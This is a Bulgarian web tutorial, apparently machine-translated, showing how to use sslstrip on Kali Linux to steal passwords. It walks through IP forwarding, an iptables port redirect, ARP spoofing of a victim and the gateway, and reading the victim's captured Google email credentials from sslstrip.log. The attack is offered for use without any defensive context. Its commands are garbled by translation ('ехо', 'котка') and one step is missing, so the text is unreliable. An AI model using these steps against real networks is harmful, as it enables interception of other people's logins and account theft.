Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla,
![Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla, (sslstrip) Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla,](https://webp.images-on-off.com/7/329/434x174_t26zhiltltqwrcilll6b.webp)
sslstrip полезност улавя HTTP трафик от компютър в локалната мрежа и по този начин ни дава възможност да разберем пароли на всички сайтове. Как да използвате тази програма?
За да започнете, отворете терминален и стартирайте командния sslstrip -h да се научат всички опции за инструменти.
![Кали използване Linux sslstrip парола прихващане - thecurrent - става дума за Linux, Joomla, (хак) Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla,](https://webp.images-on-off.com/7/329/434x221_cn3v4thwhzy1mwda2xqd.webp)
Преди да започнете работа с sslstrip което трябва да направим някакво действие
1. Необходимо е да се даде възможност на IP Forwarding
ехо "1"> / Proc / сис / нето / IPv4 / ip_forward
2. Активиране пренасочва заявките от пристанище 80-8080
IPTABLES -t NAT -А PREROUTING -p TCP -destination-порт 80 -j REDIRECT до-порт 8080
3. Определяне на нашия портал NETSTAT-NR
![Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla, (sslstrip) Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla,](https://webp.images-on-off.com/7/329/434x218_k9sgtqctlmk5kvn7sut9.webp)
5. пренасочва всички HTTP трафик от нашия компютър към шлюза
arpspoof -i eth0 -t 192.168.71.128 -r 192.168.71.2
![Кали използване Linux sslstrip парола прихващане - thecurrent - става дума за Linux, Joomla, (с отворен код) Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla,](https://webp.images-on-off.com/7/329/434x158_f33yvibqv4rpuk32ckt4.webp)
Сега, без да затваряте прозореца на терминала, се отвори друг, и то с подслушване порт 8080 работи със sslstrip:
sslstrip -l 8080
![Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla, (Кали) Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla,](https://webp.images-on-off.com/7/329/434x130_uvbm0lvnqhckt6yhp18q.webp)
Сега, аз съм на компютъра на жертвата, отивам на имейла Google:
![Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla, (sslstrip) Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla,](https://webp.images-on-off.com/7/329/434x288_zq96hws29cz7jc6y35pq.webp)
След като дойде по пощата на компютъра с терминален прозорец Кали Linux с работна sslstrip натиснете Ctrl + C за да отмените операцията. Цялата информация се съхранява във файл sslstrip.log
![Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla, (Кали) Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla,](https://webp.images-on-off.com/7/329/434x197_4jx18ipkld6gzvig71dc.webp)
Нека да видим съдържанието на файла:
котка sslstrip.log - потребителско име и парола са обграден от червена рамка
![Кали използване Linux sslstrip парола прихващане - thecurrent - става дума за Linux, Joomla, (хак) Кали използване Linux sslstrip да прихване паролата - thecurrent - става дума за Linux, Joomla,](https://webp.images-on-off.com/7/329/434x134_jk9xlcp1d5xqcx325prm.webp)
Ето как всичко това работи, на добър час!